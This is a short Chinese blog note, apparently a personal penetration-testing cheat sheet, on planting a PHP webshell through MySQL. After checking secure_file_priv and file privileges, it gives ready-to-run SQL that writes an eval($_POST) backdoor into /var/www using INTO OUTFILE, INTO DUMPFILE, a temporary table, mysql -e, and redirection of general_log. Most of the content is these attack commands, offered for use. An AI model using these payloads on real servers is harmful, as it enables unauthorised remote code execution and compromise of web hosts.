mysql webshell_小记mysql拿webshell的几种方法

前言

随便记录一下笔记,方便查询.最近是想到什么就记什么.

渗透测试mysql

关于如何攻击mysql请直接看这篇>Mysql数据库渗透及漏洞利用总结写的很全

拿shell

1前提需要知道网站的真实物理路径

2查看是否允许导入导出

show variables like '%secure%'

secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出

当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下,此时如果读写发生在其他文件夹,就会报告如下错误:

RROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制

另外,为了读取服务器上文件,在服务器主机上你必须有file的权限。否则报错:

ERROR 1045 (28000): Access denied for user

如果上述限制都满足的话,就可以开始了

outfile

select '<?php eval($_POST[xxx]) ?>' into outfile '/var/www/xx.php';

dumpfile

select '<?php eval($_POST[xx]) ?>' into dumpfile '/var/www/xx.php';

借助表

Drop TABLE IF EXISTS temp;Create TABLE temp(cmd text NOT NULL);Insert INTO temp (cmd) VALUES('<?php eval($_POST[xxx]) ?>');Select cmd from temp into out file '/var/www/xx.php';Drop TABLE IF EXISTS temp;

用-e参数

mysql -uuser -ppasswd -e "select '' into outfile '/var/www/xxx.php'"

利用general_log拿shell

如果导入导出被禁用了就可以用这个方法.前提是root

set global general_log=on;

set global general_log_file='/var/www/xxx.php';

select '<?php eval($_POST[jumbo]) ?>';

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值